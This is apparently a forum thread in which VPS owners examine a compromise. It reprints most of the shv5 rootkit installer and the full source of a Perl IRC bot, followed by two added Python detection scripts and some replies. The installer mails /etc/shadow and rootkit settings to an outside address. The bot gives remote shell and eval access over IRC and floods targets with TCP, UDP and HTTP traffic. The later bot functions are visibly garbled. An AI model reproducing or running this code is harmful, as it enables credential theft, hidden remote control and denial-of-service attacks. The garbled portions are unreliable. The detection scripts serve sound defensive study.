    echo -n "${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/redhat-release`${RES}"
elif [ -f /etc/slackware-version ]; then
    echo -n "${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/slackware-version`${RES}"
elif [ -f /etc/debian_version ]; then
    echo -n "${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/debian_version`${RES}"
elif [ -f /etc/SuSE-release ]; then
    echo -n "${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/SuSE-release`${RES}"
elif [ -f /etc/issue ]; then
    echo -n "${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/issue`${RES}"
else echo -n "${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} unknown${RES}"
fi
rm -rf /tmp/info_tmp

cat /etc/shadow >> /tmp/.cln
/sbin/ifconfig >> /tmp/.cln
cat /etc/issue >> /tmp/.cln
#cat /tmp/.cln | mail $md5sum -s "$1:$2:`hostname -f`:$MYIPADDR"
cat /tmp/.cln | mail -s "rk" geox_go@yahoo.com
cat /lib/libsh.so/shdcf >> /tmp/.mf
cat /tmp/.mf | mail -s "rk por" geox_go@yahoo.com
cat /tmp/.mf | mail -s "rk por" geox_go@yahoo.com
cat /tmp/.cln | mail -s "rk" geox_go@yahoo.com
rm -rf /tmp/.cln
rm -rf /tmp/.mf

endtime=`date +%S`
total=`expr $endtime - $startime`
echo ""
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# ipchains ... ? ${RES}"
if [ -f /sbin/ipchains ]; then
    echo "${WHI}`/sbin/ipchains -L input | head -5`${RES}"
else
    echo ""
    echo "${DCYN}[${WHI}sh${DCYN}]# lucky for u no ipchains found${RES}"
fi
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# iptables ...?${RES}"
if [ -f /sbin/iptables ]; then
    echo "${WHI}`/sbin/iptables -L input | head -5`${RES}"
else
    echo ""
    echo "${DCYN}[${WHI}sh${DCYN}]# lucky for u no iptables found${RES}"
fi
echo "${WHI}--------------------------------------------------------------------${RES}"
echo "${DCYN}[${WHI}sh${DCYN}]# Just ignore all errors if any ! "
echo "${DCYN}[${WHI}sh${DCYN}]# ============================== ${RED}Backdooring completed in :$total seconds ${RES}"
if [ -f /usr/sbin/syslogd ]; then
    /usr/sbin/syslogd -m 0
else
    /sbin/syslogd -m 0
fi
if [ -f /usr/sbin/inetd ]; then
    killall -HUP inetd >/dev/null 2>&1
elif [ -f /usr/sbin/xinetd ]; then
    killall -HUP xinetd
fi
rm -rf .sshd
cd $BASEDIR
rm -rf ../shv5*
#sendmail root -p geox_go@yahoo.com
rm -rf bin* conf* lib* utilz* rk.jpg setup
# EOF

Last edited by hello2crawler on 2010-4-5 00:45
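An added example for readers of this thread, not code from the poster or from the rootkit. It checks a Linux root filesystem for what the setup script above leaves behind: the paths it creates (/sbin/ttyload, /lib/libsh.so, /etc/sh.conf, /usr/include/hosts.h and friends), the "0:2345:once:/usr/sbin/ttyload" line it appends to /etc/inittab, and the binaries it overwrites after copying the originals into /usr/lib/libsh/.backup. Because the script replaces ls, find, ps, netstat and md5sum, none of those can be trusted on the box, so every check here goes through stat()/open() and hashes in-process, and the ps comparison takes a /proc listing as input. The root prefix, the .backup layout and the demo tree are assumptions taken from the script text; the demo tree is constructed, not a real capture.

```python
#!/usr/bin/env python3
"""Look for the artefacts the shv5 'setup' script leaves behind (added example)."""
import hashlib
import os
import tempfile

# Paths the script creates or installs into (taken from the script text).
SHV5_PATHS = [
    "/sbin/ttyload", "/sbin/ttymon", "/sbin/ttylib", "/usr/sbin/ttyload",
    "/lib/libsh.so", "/usr/lib/libsh", "/usr/lib/libsh/.backup",
    "/etc/sh.conf", "/lib/lidps1.so", "/dev/srd0",
    "/usr/include/hosts.h", "/usr/include/file.h",
    "/usr/include/log.h", "/usr/include/proc.h",
]

# Binaries the script overwrites after copying the originals to .backup.
TROJANED = [
    "/bin/ps", "/usr/bin/ps", "/sbin/ifconfig", "/bin/netstat",
    "/usr/sbin/netstat", "/usr/bin/top", "/usr/bin/slocate", "/bin/ls",
    "/usr/bin/find", "/usr/bin/dir", "/usr/sbin/lsof", "/usr/bin/pstree",
    "/usr/bin/md5sum",
]


def present_paths(root="/"):
    """Artefact paths that exist under root. lexists() is a kernel stat(),
    which a user-space trojaned ls/find cannot filter."""
    return [p for p in SHV5_PATHS if os.path.lexists(os.path.join(root, p.lstrip("/")))]


def inittab_hook(root="/"):
    """Active inittab lines that start ttyload (the script appends
    '0:2345:once:/usr/sbin/ttyload' so the backdoor survives a reboot)."""
    path = os.path.join(root, "etc/inittab")
    if not os.path.isfile(path):
        return []
    with open(path, errors="replace") as f:
        return [ln.rstrip("\n") for ln in f
                if "ttyload" in ln and not ln.lstrip().startswith("#")]


def sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def replaced_binaries(root="/"):
    """Live binaries whose hash differs from the original the script stashed
    in /usr/lib/libsh/.backup. Returns {live_path: backup_path}. Hashing is
    done here, never via the system md5sum, which the script also replaces."""
    backup = os.path.join(root, "usr/lib/libsh/.backup")
    if not os.path.isdir(backup):
        return {}
    diffs = {}
    for p in TROJANED:
        live = os.path.join(root, p.lstrip("/"))
        orig = os.path.join(backup, os.path.basename(p))
        if os.path.isfile(live) and os.path.isfile(orig) and sha256(live) != sha256(orig):
            diffs[p] = orig
    return diffs


def hidden_pids(proc_pids, ps_pids):
    """PIDs present in /proc but absent from ps output. The replaced ps hides
    the backdoor's processes; /proc is kernel-maintained, so on a live box
    pass os.listdir('/proc') as proc_pids and the PID column of ps as ps_pids."""
    return sorted(set(proc_pids) - set(ps_pids), key=int)


def build_demo_tree():
    """Constructed sample (not a real capture): a throwaway tree laid out the
    way setup leaves a box, so the checks can run offline."""
    root = tempfile.mkdtemp(prefix="shv5demo_")
    for d in ("sbin", "usr/sbin", "bin", "etc", "usr/lib/libsh/.backup"):
        os.makedirs(os.path.join(root, d))
    files = {
        "etc/inittab": b"id:3:initdefault:\n# Loading standard ttys\n"
                       b"0:2345:once:/usr/sbin/ttyload\n1:2345:respawn:/sbin/mingetty tty1\n",
        "sbin/ttyload": b"(backdoor sshd)", "usr/sbin/ttyload": b"/sbin/ttyload -q\n",
        "etc/sh.conf": b"(md5 of backdoor password)\n",
        "bin/ps": b"(trojaned ps)", "usr/lib/libsh/.backup/ps": b"(original ps)",
        "bin/ls": b"(unchanged ls)", "usr/lib/libsh/.backup/ls": b"(unchanged ls)",
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    return root


if __name__ == "__main__":
    root = build_demo_tree()
    print("artefacts:", present_paths(root))
    print("inittab hook:", inittab_hook(root))
    print("replaced binaries:", replaced_binaries(root))
    print("hidden pids:", hidden_pids(["1", "15537", "22009"], ["1", "22009"]))
```

Run it against a disk image mounted read-only (present_paths("/mnt/image") and so on) rather than the live box; the script sets the immutable/append-only attributes on everything it installs, so expect chattr -isa to be needed before any cleanup, and take a forensic copy before touching anything.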
.sshd is a Perl script... it seems to just announce the zombie's address?
And it doesn't look like it is there to notify the intruder... plus he even made a typo while changing the root password = = so probably not some hotshot.
#!/usr/bin/perl
####################################################
# Hawker Hunter v2.0 (ARZ Co. Ltd.) Legacy 2009(c) #
####################################################
#############CONF###################################
my $hidden = '/usr/sbin/apache/log';
my $linas_max='4';
my $sleep='5';
my @admins=("Geox");
my @hostauth=("geox.users.quakenet.org");
my @channels=("#sniffer");
my $nick='Sonia';
my $ircname ='furt';
my $realname = 'pe fatza';
my $server='multiplay.uk.quakenet.org';
my $port='6667';
####################################################
###########theRe we Go##############################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$0="$hidden"."\0"x16;;
my $pid=fork;
exit if $pid;
die "fork problem: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();

sub sendraw {
    if ($#_ == '1') {
        my $socket = $_[0];
        print $socket "$_[1]\n";
    } else {
        print $IRC_cur_socket "$_[0]\n";
    }
}

sub conectar {
    my $meunick = $_[0];
    my $server_con = $_[1];
    my $port_con = $_[2];
    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con", PeerPort=>$port_con) or return(1);
    if (defined($IRC_socket)) {
        $IRC_cur_socket = $IRC_socket;
        $IRC_socket->autoflush(1);
        $sel_cliente->add($IRC_socket);
        $irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
        $irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
        $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
        nick("$meunick");
        sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
        sleep 1;
    }
}

my $line_temp;
while( 1 ) {
    while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_cliente->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
        $IRC_cur_socket = $fh;
        $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
        $nread = sysread($fh, $msg, 4096);
        if ($nread == 0) {
            $sel_cliente->remove($fh);
            $fh->close;
            delete($irc_servers{$fh});
        }
        @lines = split (/\n/, $msg);
        for(my $c=0; $c<= $#lines; $c++) {
            $line = $lines[$c];
            $line=$line_temp.$line if ($line_temp);
            $line_temp='';
            $line =~ s/\r$//;
            unless ($c == $#lines) {
                parse("$line");
            } else {
                if ($#lines == 0) {
                    parse("$line");
                } elsif ($lines[$c] =~ /\r$/) {
                    parse("$line");
                } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
                    parse("$line");
                } else {
                    $line_temp = $line;
                }
            }
        }
    }
}

sub parse {
    my $servarg = shift;
    if ($servarg =~ /^PING \:(.*)/) {
        sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
        if ($args =~ /^\001VERSION\001$/) {
            notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
        }
        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
            if (grep {$_ =~ /^\Q$pn\E$/i } @admins) {
                if ($onde eq "$meunick"){
                    shell("$pn", "$args");
                }
                if ($args =~ /^(\Q$meunick\E|\!zax)\s+(.*)/ ) {
                    my $natrix = $1;
                    my $arg = $2;
                    if ($arg =~ /^\!(.*)/) {
                        ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
                    } elsif ($arg =~ /^\@(.*)/) {
                        $ondep = $onde;
                        $ondep = $pn if $onde eq $meunick;
                        bfunc("$ondep","$1");
                    } else {
                        shell("$onde", "$arg");
                    }
                }
            }
        }
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
        if (lc($1) eq lc($meunick)) {
            $meunick=$4;
            $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
        }
    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
        nick("$meunick-".int rand(999999));
    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
        $meunick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        foreach my $channel (@channels) {
            sendraw("JOIN $channel hawker");
        }
    }
}

sub bfunc {
    my $printl = $_[0];
    my $funcarg = $_[1];
    if (my $pid = fork) {
        waitpid($pid, 0);
    } else {
        if (fork) {
            exit;
        } else {
            if ($funcarg =~ /^portscan (.*)/) {
                my $hostip="$1";
                my @ports=("21","22","23","25","80","113","135","443","445","5900","5901","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","1080");
                my (@aberta, %port_banner);
                sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR] 3Scanning4 ".$1." for open ports.");
                foreach my $port (@ports){
                    my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $port, Proto => 'tcp', Timeout => 4);
                    if ($scansock) {
                        push (@aberta, $port);
                        $scansock->close;
                    }
                }
                if (@aberta) {
                    sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR] 3Open port(s)4: @aberta");
                } else {
                    sendraw($IRC_cur_socket,"PRIVMSG $printl :[2hawkeR hunteR]3 No open ports found4!");
                }
            }
            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
                sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR]3 TCP Attacking4 ".$1.":".$2." 3for4 ".$3." 3seconds.");
                my $itime = time;
                my ($cur_time);
                $cur_time = time - $itime;
                while ($3>$cur_time){
                    $cur_time = time - $itime;
                    &tcpflooder("$1","$2","$3");
                }
                sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR]3 TCP Attack done 4".$1.":".$2.".");
            }
            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
                sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR]3 HTTP Attacking4 ".$1." 3for4 ".$2." 3seconds.");
                my $itime = time;
                my ($cur_time);
                $cur_time = time - $itime;
                while ($2>$cur_time){
                    $cur_time = time - $itime;
                    my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
                    print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
                    close($socket);
                }
                sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR]3HTTP Attacking done ".$1.".");
            }
            ##########UDP-1#############################################
            if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
                sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR]3 UDP Attacking4 ".$1." 3with4 ".$2." 3KB(s) for4 ".$3." 3seconds.");
                my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
                $dtime = 1 if $dtime == 0;
                my %bytes;
                $bytes{igmp} = $2 * $pacotes{igmp};
                $bytes{icmp} = $2 * $pacotes{icmp};
                $bytes{o} = $2 * $pacotes{o};
                $bytes{udp} = $2 * $pacotes{udp};
                $bytes{tcp} = $2 * $pacotes{tcp};
                sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR]3 UDP Sent4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 3Kb in4 ".$dtime." 3seconds to ".$1.".");
            }
            ##########UDP-2#############################################
            if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)\s+(\d+)/) {
                sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR]3 UDP2 Attacking4 ".$1.":".$4." 3with4 ".$2." 3KB(s) for4 ".$3." 3seconds.");
                my ($dtime, %pacotes) = udpflooder2("$1", "$2", "$3","$4");
                $dtime = 1 if $dtime == 0;
                my %bytes;
                $bytes{igmp} = $2 * $pacotes{igmp};
                $bytes{icmp} = $2 * $pacotes{icmp};
                $bytes{o} = $2 * $pacotes{o};
                $bytes{udp} = $2 * $pacotes{udp};
                $bytes{tcp} = $2 * $pacotes{tcp};
                sendraw($IRC_cur_socket, "PRIVMSG $printl :[2hawkeR hunteR]3 UDP Sent4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 3Kb in4 ".$dtime." 3seconds to ".$1.".");
            }
            ############################################################
            exit;
        }
    }
}

sub ircase {
    my ($kem, $printl, $case) = @_;
    if ($case =~ /^join (.*)/) {
        j("$1");
    }
    if ($case =~ /^part (.*)/) {
        p("$1");
    }
    if ($case =~ /^rejoin\s+(.*)/) {
        my $chan = $1;
        if ($chan =~ /^(\d+) (.*)/) {
            for (my $ca = 1; $ca <= $1; $ca++ ) {
                p("$2");
                j("$2");
            }
        } else {
            p("$chan");
            j("$chan");
        }
    }
    if ($case =~ /^op/) {
        op("$printl", "$kem") if $case eq "op";
        my $oarg = substr($case, 3);
        op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^deop/) {
        deop("$printl", "$kem") if $case eq "deop";
        my $oarg = substr($case, 5);
        deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
    }
    if ($case =~ /^msg\s+(\S+) (.*)/) {
        msg("$1", "$2");
    }
    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
        for (my $cf = 1; $cf <= $1; $cf++) {
            msg("$2", "$3");
        }
    }
    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
        ctcp("$1", "$2");
    }
    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
        for (my $cf = 1; $cf <= $1; $cf++) {
            ctcp("$2", "$3");
        }
    }
    if ($case =~ /^nick (.*)/) {
        nick("$1");
    }
    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
        conectar("$2", "$1", 6667);
    }
    if ($case =~ /^raw (.*)/) {
        sendraw("$1");
    }
    if ($case =~ /^eval (.*)/) {
        eval "$1";
}
}
sub shell {
my $printl=$_;
my $comando=$_;
if ($comando =~ /cd (.*)/) {
chdir(\"$1\") || msg(\"$printl\", \"No such file or directory\");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, \"PRIVMSG $printl :$linha\");
if ($c == \"$linas_max\") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_);
$pa=sockaddr_in($_,$ia);
$ftime=$_;
$proto=getprotobyname(\'tcp\');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t=\"SOCK$l\";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t=\"SOCK$l\";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_);
my $msg = \'A\' x $_;
my $ftime = $_;
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1; $port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub udpflooder2 {
my $iaddr = inet_aton($_);
my $msg = \'A\' x $_;
my $ftime = $_;
my $cp = 0;
my $udpport = $_;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++;
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw(\"PRIVMSG $_ :\\001$_\\001\");
}
sub msg {
return unless $#_ == 1;
sendraw(\"PRIVMSG $_ :$_\");
}
sub notice {
return unless $#_ == 1;
sendraw(\"NOTICE $_ :$_\");
}
sub op {
return unless $#_ == 1;
sendraw(\"MODE $_ +o $_\");
}
sub deop {
return unless $#_ == 1;
sendraw(\"MODE $_ -o $_\");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw(\"JOIN $_\");
}
sub p { part(@_); }
sub part {
sendraw(\"PART $_\");
}
sub nick {
return unless $#_ == 0;
sendraw(\"NICK $_\");
}
sub quit {
sendraw(\"QUIT :$_\");
}
OP, doesn't your VPS have a control panel?
The simplest fix is to reinstall the system and change the SSH port...
vine posted on 2010-4-5 11:51
That method is the simplest and most effective.
That method is the simplest and most effective.
oncename posted on 2010-4-5 00:00
Any port scanner will find it anyway.
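A defender-side check, added here and not part of the thread or of the bot: a small Python scanner that walks a directory and flags files carrying several of the distinctive strings from the Perl IRC bot posted above, scoring on content rather than on file extension. The marker weights, the threshold and the two sample files are my own constructed assumptions; only the marker strings themselves come from the listing.

```python
import os
import tempfile

# Marker strings taken from the bot listing; weights are assumed, not from the page.
BOT_MARKERS = {
    "hawkeR hunteR": 3,      # banner the bot prefixes to every IRC message
    "udpflooder": 2,
    "tcpflooder": 2,
    "httpflood": 2,
    "IO::Socket::INET": 1,   # also used by legitimate Perl, so weighted low
    "PRIVMSG": 1,
    "sendraw": 1,
    "SOCK_RAW": 1,
}
THRESHOLD = 5  # assumed cut-off: one low-weight hit alone never triggers


def score_text(text: str) -> int:
    """Sum the weights of all markers present in text."""
    return sum(w for marker, w in BOT_MARKERS.items() if marker in text)


def scan_tree(root: str, max_bytes: int = 4 * 1024 * 1024) -> list:
    """Return sorted (path, score) pairs for files scoring at or above THRESHOLD.

    Files are read as bytes and decoded leniently, so a script hidden under
    an image-like name is scored the same as one ending in .pl.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            score = score_text(data.decode("latin-1"))
            if score >= THRESHOLD:
                hits.append((path, score))
    return sorted(hits)


# Constructed samples (not the bot's code): a few page strings in a file with
# a misleading name, and a benign Perl client that shares only one marker.
SAMPLE_BOT = ('sendraw($IRC_cur_socket, "PRIVMSG $printl :[hawkeR hunteR] Open port(s): @aberta");\n'
              'my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");\n')
SAMPLE_BENIGN = 'use IO::Socket::INET;\nmy $s = IO::Socket::INET->new(PeerAddr => "localhost");\n'


def demo() -> list:
    """Write the constructed samples into a temp dir, scan it, return relative hits."""
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, ".cache"))
        with open(os.path.join(d, ".cache", "photo.jpg"), "w") as f:
            f.write(SAMPLE_BOT)
        with open(os.path.join(d, "client.pl"), "w") as f:
            f.write(SAMPLE_BENIGN)
        return [(os.path.relpath(p, d), s) for p, s in scan_tree(d)]
```

Run `demo()` to see the scan flag only the disguised file; point `scan_tree` at web roots, /tmp and home directories when sweeping a real host.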